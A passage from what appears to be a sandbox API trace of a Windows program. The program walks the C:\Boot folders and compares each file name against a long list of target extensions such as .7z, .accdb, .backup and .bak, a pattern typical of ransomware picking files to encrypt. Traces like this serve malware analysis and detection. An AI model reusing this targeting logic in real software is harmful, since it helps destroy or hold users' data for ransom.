nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="sr-Latn-CS", cAlternateFileName="SR-LAT~1")) returned 1 [0285.284] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0xfffe) returned 0x54cee8 [0285.284] FindFirstFileW (in: lpFileName="C:\\Boot\\sr-Latn-CS\\*", lpFindFileData=0x2e8f800 | out: lpFindFileData=0x2e8f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc495eef9, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0x5168548b, ftLastAccessTime.dwHighDateTime=0x1d3271b, ftLastWriteTime.dwLowDateTime=0x5168548b, ftLastWriteTime.dwHighDateTime=0x1d3271b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3948268 [0285.284] FindNextFileW (in: hFindFile=0x3948268, lpFindFileData=0x2e8f800 | out: lpFindFileData=0x2e8f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc495eef9, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0x5168548b, ftLastAccessTime.dwHighDateTime=0x1d3271b, ftLastWriteTime.dwLowDateTime=0x5168548b, ftLastWriteTime.dwHighDateTime=0x1d3271b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0285.284] FindNextFileW (in: hFindFile=0x3948268, lpFindFileData=0x2e8f800 | out: lpFindFileData=0x2e8f800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc495eef9, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc495eef9, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0x21212f9a, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x12d60, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0285.284] FindNextFileW (in: hFindFile=0x3948268, lpFindFileData=0x2e8f800 | out: lpFindFileData=0x2e8f800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc495eef9, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0x5168548b, ftLastAccessTime.dwHighDateTime=0x1d3271b, ftLastWriteTime.dwLowDateTime=0xe318f070, ftLastWriteTime.dwHighDateTime=0x1d112e1, nFileSizeHigh=0x0, nFileSizeLow=0xaf58, dwReserved0=0x0, dwReserved1=0x0, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 1 [0285.284] FindNextFileW (in: hFindFile=0x3948268, lpFindFileData=0x2e8f800 | out: lpFindFileData=0x2e8f800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc495eef9, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0x5168548b, ftLastAccessTime.dwHighDateTime=0x1d3271b, ftLastWriteTime.dwLowDateTime=0xe318f070, ftLastWriteTime.dwHighDateTime=0x1d112e1, nFileSizeHigh=0x0, nFileSizeLow=0xaf58, dwReserved0=0x0, dwReserved1=0x0, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 0 [0285.284] FindClose (in: hFindFile=0x3948268 | out: hFindFile=0x3948268) returned 1 [0285.284] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x54cee8 | out: hHeap=0x470000) returned 1 [0285.284] FindNextFileW (in: hFindFile=0x3947be8, lpFindFileData=0x2e8fa7c | out: lpFindFileData=0x2e8fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc495eef9, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc495eef9, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0xc495eef9, ftLastWriteTime.dwHighDateTime=0x1d32764, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="sr-Latn-RS", cAlternateFileName="SR-LAT~2")) returned 1 [0285.284] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0xfffe) returned 0x54cee8 [0285.285] FindFirstFileW (in: lpFileName="C:\\Boot\\sr-Latn-RS\\*", lpFindFileData=0x2e8f800 | out: lpFindFileData=0x2e8f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc495eef9, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc495eef9, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0xc495eef9, ftLastWriteTime.dwHighDateTime=0x1d32764, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3947c28 [0285.285] FindNextFileW (in: hFindFile=0x3947c28, lpFindFileData=0x2e8f800 | out: lpFindFileData=0x2e8f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc495eef9, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc495eef9, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0xc495eef9, ftLastWriteTime.dwHighDateTime=0x1d32764, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0285.285] FindNextFileW (in: hFindFile=0x3947c28, lpFindFileData=0x2e8f800 | out: lpFindFileData=0x2e8f800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc495eef9, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc495eef9, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0x21212f9a, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x12d60, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0285.285] FindNextFileW (in: hFindFile=0x3947c28, lpFindFileData=0x2e8f800 | out: lpFindFileData=0x2e8f800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc495eef9, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc495eef9, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0x21212f9a, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x12d60, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0285.285] FindClose (in: hFindFile=0x3947c28 | out: hFindFile=0x3947c28) returned 1 [0285.286] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x54cee8 | out: hHeap=0x470000) returned 1 [0285.286] FindNextFileW (in: hFindFile=0x3947be8, lpFindFileData=0x2e8fa7c | out: lpFindFileData=0x2e8fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc495eef9, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa01adf43, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef6a2250, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="sv-SE", cAlternateFileName="")) returned 1 [0285.286] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0xfffe) returned 0x54cee8 [0285.286] FindFirstFileW (in: lpFileName="C:\\Boot\\sv-SE\\*", lpFindFileData=0x2e8f800 | out: lpFindFileData=0x2e8f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc495eef9, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa01adf43, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef6a2250, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x39481a8 [0285.286] FindNextFileW (in: hFindFile=0x39481a8, lpFindFileData=0x2e8f800 | out: lpFindFileData=0x2e8f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc495eef9, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa01adf43, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef6a2250, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0285.287] FindNextFileW (in: hFindFile=0x39481a8, lpFindFileData=0x2e8f800 | out: lpFindFileData=0x2e8f800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc495eef9, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc495eef9, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0x21107f25, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x12960, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0285.287] FindNextFileW (in: hFindFile=0x39481a8, lpFindFileData=0x2e8f800 | out: lpFindFileData=0x2e8f800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc495eef9, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef6a2250, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xf2f699a6, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0xaf98, dwReserved0=0x0, dwReserved1=0x0, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 1 [0285.287] FindNextFileW (in: hFindFile=0x39481a8, lpFindFileData=0x2e8f800 | out: lpFindFileData=0x2e8f800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc495eef9, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef6a2250, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xf2f699a6, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0xaf98, dwReserved0=0x0, dwReserved1=0x0, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 0 [0285.287] FindClose (in: hFindFile=0x39481a8 | out: hFindFile=0x39481a8) returned 1 [0285.287] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x54cee8 | out: hHeap=0x470000) returned 1 [0285.287] FindNextFileW (in: hFindFile=0x3947be8, lpFindFileData=0x2e8fa7c | out: lpFindFileData=0x2e8fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc495eef9, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa0206504, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef6b5aca, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="tr-TR", cAlternateFileName="")) returned 1 [0285.287] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0xfffe) returned 0x54cee8 [0285.287] FindFirstFileW (in: lpFileName="C:\\Boot\\tr-TR\\*", lpFindFileData=0x2e8f800 | out: lpFindFileData=0x2e8f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc495eef9, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa0206504, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef6b5aca, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3948168 [0285.289] FindNextFileW (in: hFindFile=0x3948168, lpFindFileData=0x2e8f800 | out: lpFindFileData=0x2e8f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc495eef9, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa0206504, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef6b5aca, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0285.289] FindNextFileW (in: hFindFile=0x3948168, lpFindFileData=0x2e8f800 | out: lpFindFileData=0x2e8f800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc495eef9, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc495eef9, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0x210e1cce, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x12558, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0285.289] FindNextFileW (in: hFindFile=0x3948168, lpFindFileData=0x2e8f800 | out: lpFindFileData=0x2e8f800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc495eef9, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef6b5aca, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xf2f4373a, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0xb1a0, dwReserved0=0x0, dwReserved1=0x0, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 1 [0285.289] FindNextFileW (in: hFindFile=0x3948168, lpFindFileData=0x2e8f800 | out: lpFindFileData=0x2e8f800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc495eef9, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef6b5aca, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xf2f4373a, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0xb1a0, dwReserved0=0x0, dwReserved1=0x0, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 0 [0285.289] FindClose (in: hFindFile=0x3948168 | out: hFindFile=0x3948168) returned 1 [0285.290] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x54cee8 | out: hHeap=0x470000) returned 1 [0285.290] FindNextFileW (in: hFindFile=0x3947be8, lpFindFileData=0x2e8fa7c | out: lpFindFileData=0x2e8fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc495eef9, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa0206a30, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xc495eef9, ftLastWriteTime.dwHighDateTime=0x1d32764, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="uk-UA", cAlternateFileName="")) returned 1 [0285.290] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0xfffe) returned 0x54cee8 [0285.290] FindFirstFileW (in: lpFileName="C:\\Boot\\uk-UA\\*", lpFindFileData=0x2e8f800 | out: lpFindFileData=0x2e8f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc495eef9, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa0206a30, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xc495eef9, ftLastWriteTime.dwHighDateTime=0x1d32764, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3947ea8 [0285.296] FindNextFileW (in: hFindFile=0x3947ea8, lpFindFileData=0x2e8f800 | out: lpFindFileData=0x2e8f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc495eef9, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa0206a30, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xc495eef9, ftLastWriteTime.dwHighDateTime=0x1d32764, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0285.296] FindNextFileW (in: hFindFile=0x3947ea8, lpFindFileData=0x2e8f800 | out: lpFindFileData=0x2e8f800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc495eef9, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc495eef9, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0x210e1cce, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x12d60, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0285.296] FindNextFileW (in: hFindFile=0x3947ea8, lpFindFileData=0x2e8f800 | out: lpFindFileData=0x2e8f800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc495eef9, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc495eef9, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0x210e1cce, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x12d60, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0285.296] FindClose (in: hFindFile=0x3947ea8 | out: hFindFile=0x3947ea8) returned 1 [0285.296] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x54cee8 | out: hHeap=0x470000) returned 1 [0285.296] FindNextFileW (in: hFindFile=0x3947be8, lpFindFileData=0x2e8fa7c | out: lpFindFileData=0x2e8fa7c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xef6c9427, ftCreationTime.dwHighDateTime=0x1d3273d, ftLastAccessTime.dwLowDateTime=0xef6c9427, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xf2d79a60, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0x1236, dwReserved0=0x0, dwReserved1=0x240000, cFileName="updaterevokesipolicy.p7b", cAlternateFileName="UPDATE~1.P7B")) returned 1 [0285.297] FindNextFileW (in: hFindFile=0x3947be8, lpFindFileData=0x2e8fa7c | out: lpFindFileData=0x2e8fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc498516b, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa0207100, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef6d7e9a, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="zh-CN", cAlternateFileName="")) returned 1 [0285.297] lstrlenW (lpString="C:\\Boot\\zh-CN") returned 13 [0285.297] lstrcmpiW (lpString1="C:\\WINDOWS", lpString2="C:\\Boot\\zh-CN") returned 1 [0285.297] lstrlenW (lpString="zh-CN") returned 5 [0285.297] lstrcmpiW (lpString1="C:\\WINDOWS", lpString2="zh-CN") returned -1 [0285.297] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0xfffe) returned 0x54cee8 [0285.297] lstrlenW (lpString="C:\\Boot\\zh-CN") returned 13 [0285.297] FindFirstFileW (in: lpFileName="C:\\Boot\\zh-CN\\*", lpFindFileData=0x2e8f800 | out: lpFindFileData=0x2e8f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc498516b, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa0207100, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef6d7e9a, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x39481a8 [0285.298] FindNextFileW (in: hFindFile=0x39481a8, lpFindFileData=0x2e8f800 | out: lpFindFileData=0x2e8f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc498516b, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa0207100, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef6d7e9a, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0285.298] FindNextFileW (in: hFindFile=0x39481a8, lpFindFileData=0x2e8f800 | out: lpFindFileData=0x2e8f800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc498516b, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc498516b, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0x2123921c, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xf960, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0285.298] lstrlenW (lpString="bootmgr.exe.mui") returned 15 [0285.299] lstrlenW (lpString=".1cd") returned 4 [0285.299] lstrcmpiW (lpString1=".1cd", lpString2=".mui") returned -1 [0285.299] lstrlenW (lpString=".3ds") returned 4 [0285.299] lstrcmpiW (lpString1=".3ds", lpString2=".mui") returned -1 [0285.299] lstrlenW (lpString=".3fr") returned 4 [0285.299] lstrcmpiW (lpString1=".3fr", lpString2=".mui") returned -1 [0285.299] lstrlenW (lpString=".3g2") returned 4 [0285.299] lstrcmpiW (lpString1=".3g2", lpString2=".mui") returned -1 [0285.299] lstrlenW (lpString=".3gp") returned 4 [0285.299] lstrcmpiW (lpString1=".3gp", lpString2=".mui") returned -1 [0285.299] lstrlenW (lpString=".7z") returned 3 [0285.299] lstrcmpiW (lpString1=".7z", lpString2="mui") returned -1 [0285.299] lstrlenW (lpString=".accda") returned 6 [0285.299] lstrcmpiW (lpString1=".accda", lpString2="xe.mui") returned -1 [0285.300] lstrlenW (lpString=".accdb") returned 6 [0285.300] lstrcmpiW (lpString1=".accdb", lpString2="xe.mui") returned -1 [0285.300] lstrlenW (lpString=".accdc") returned 6 [0285.300] lstrcmpiW (lpString1=".accdc", lpString2="xe.mui") returned -1 [0285.300] lstrlenW (lpString=".accde") returned 6 [0285.300] lstrcmpiW (lpString1=".accde", lpString2="xe.mui") returned -1 [0285.300] lstrlenW (lpString=".accdt") returned 6 [0285.300] lstrcmpiW (lpString1=".accdt", lpString2="xe.mui") returned -1 [0285.300] lstrlenW (lpString=".accdw") returned 6 [0285.300] lstrcmpiW (lpString1=".accdw", lpString2="xe.mui") returned -1 [0285.300] lstrlenW (lpString=".adb") returned 4 [0285.300] lstrcmpiW (lpString1=".adb", lpString2=".mui") returned -1 [0285.300] lstrlenW (lpString=".adp") returned 4 [0285.300] lstrcmpiW (lpString1=".adp", lpString2=".mui") returned -1 [0285.300] lstrlenW (lpString=".ai") returned 3 [0285.300] lstrcmpiW (lpString1=".ai", lpString2="mui") returned -1 [0285.300] lstrlenW (lpString=".ai3") returned 4 [0285.300] lstrcmpiW (lpString1=".ai3", lpString2=".mui") returned -1 [0285.300] lstrlenW (lpString=".ai4") returned 4 [0285.300] lstrcmpiW (lpString1=".ai4", lpString2=".mui") returned -1 [0285.300] lstrlenW (lpString=".ai5") returned 4 [0285.300] lstrcmpiW (lpString1=".ai5", lpString2=".mui") returned -1 [0285.300] lstrlenW (lpString=".ai6") returned 4 [0285.300] lstrcmpiW (lpString1=".ai6", lpString2=".mui") returned -1 [0285.300] lstrlenW (lpString=".ai7") returned 4 [0285.300] lstrcmpiW (lpString1=".ai7", lpString2=".mui") returned -1 [0285.300] lstrlenW (lpString=".ai8") returned 4 [0285.300] lstrcmpiW (lpString1=".ai8", lpString2=".mui") returned -1 [0285.300] lstrlenW (lpString=".anim") returned 5 [0285.301] lstrcmpiW (lpString1=".anim", lpString2="e.mui") returned -1 [0285.301] lstrlenW (lpString=".arw") returned 4 [0285.301] lstrcmpiW (lpString1=".arw", lpString2=".mui") returned -1 [0285.301] lstrlenW (lpString=".as") returned 3 [0285.301] lstrcmpiW (lpString1=".as", lpString2="mui") returned -1 [0285.301] lstrlenW (lpString=".asa") returned 4 [0285.301] lstrcmpiW (lpString1=".asa", lpString2=".mui") returned -1 [0285.301] lstrlenW (lpString=".asc") returned 4 [0285.301] lstrcmpiW (lpString1=".asc", lpString2=".mui") returned -1 [0285.301] lstrlenW (lpString=".ascx") returned 5 [0285.301] lstrcmpiW (lpString1=".ascx", lpString2="e.mui") returned -1 [0285.301] lstrlenW (lpString=".asm") returned 4 [0285.301] lstrcmpiW (lpString1=".asm", lpString2=".mui") returned -1 [0285.301] lstrlenW (lpString=".asmx") returned 5 [0285.301] lstrcmpiW (lpString1=".asmx", lpString2="e.mui") returned -1 [0285.301] lstrlenW (lpString=".asp") returned 4 [0285.301] lstrcmpiW (lpString1=".asp", lpString2=".mui") returned -1 [0285.301] lstrlenW (lpString=".aspx") returned 5 [0285.301] lstrcmpiW (lpString1=".aspx", lpString2="e.mui") returned -1 [0285.301] lstrlenW (lpString=".asr") returned 4 [0285.301] lstrcmpiW (lpString1=".asr", lpString2=".mui") returned -1 [0285.301] lstrlenW (lpString=".asx") returned 4 [0285.301] lstrcmpiW (lpString1=".asx", lpString2=".mui") returned -1 [0285.301] lstrlenW (lpString=".avi") returned 4 [0285.301] lstrcmpiW (lpString1=".avi", lpString2=".mui") returned -1 [0285.301] lstrlenW (lpString=".avs") returned 4 [0285.301] lstrcmpiW (lpString1=".avs", lpString2=".mui") returned -1 [0285.301] lstrlenW (lpString=".backup") returned 7 [0285.302] lstrcmpiW (lpString1=".backup", lpString2="exe.mui") returned -1 [0285.302] lstrlenW (lpString=".bak") returned 4 [0285.302] lstrcmpiW (lpString1=".bak", lpString2=".mui") returned -1 [0285.302] lstrlenW (lpString=".bay") returned 4 [0285.302] lstrcmpiW (lpString1=".bay", lpString2=".mui") returned -1 [0285.302] lstrlenW (lpString=".bd") returned 3 [0285.302] lstrcmpiW (lpString1=".bd", lpString2="mui") returned -1 [0285.302] lstrlenW (lpString=".bin") returned 4 [0285.302] lstrcmpiW (lpString1=".bin", lpString2=".mui") returned -1 [0285.302] lstrlenW (lpString=".bmp") returned 4 [0285.302] lstrcmpiW (lpString1=".bmp", lpString2=".mui") returned -1 [0285.302] lstrlenW (lpString=".bz2") returned 4 [0285.302] lstrcmpiW (lpString1=".bz2", lpString2=".mui") returned -1 [0285.302] lstrlenW (lpString=".c") returned 2 [0285.302] lstrcmpiW (lpString1=".c", lpString2="ui") returned -1 [0285.302] lstrlenW (lpString=".cdr") returned 4 [0285.302] lstrcmpiW (lpString1=".cdr", lpString2=".mui") returned -1 [0285.302] lstrlenW (lpString=".cer") returned 4 [0285.302] lstrcmpiW (lpString1=".cer", lpString2=".mui") returned -1 [0285.302] lstrlenW (lpString=".cf") returned 3 [0285.302] lstrcmpiW (lpString1=".cf", lpString2="mui") returned -1 [0285.302] lstrlenW (lpString=".cfc") returned 4 [0285.302] lstrcmpiW (lpString1=".cfc", lpString2=".mui") returned -1 [0285.302] lstrlenW (lpString=".cfm") returned 4 [0285.302] lstrcmpiW (lpString1=".cfm", lpString2=".mui") returned -1 [0285.302] lstrlenW (lpString=".cfml") returned 5 [0285.302] lstrcmpiW (lpString1=".cfml", lpString2="e.mui") returned -1 [0285.302] lstrlenW (lpString=".cfu") returned 4 [0285.303] lstrcmpiW (lpString1=".cfu", lpString2=".mui") returned -1 [0285.303] lstrlenW (lpString=".chm") returned 4 [0285.303] lstrcmpiW (lpString1=".chm", lpString2=".mui") returned -1 [0285.303] lstrlenW (lpString=".cin") returned 4 [0285.303] lstrcmpiW (lpString1=".cin", lpString2=".mui") returned -1 [0285.303] lstrlenW (lpString=".class") returned 6 [0285.303] lstrcmpiW (lpString1=".class", lpString2="xe.mui") returned -1 [0285.303] 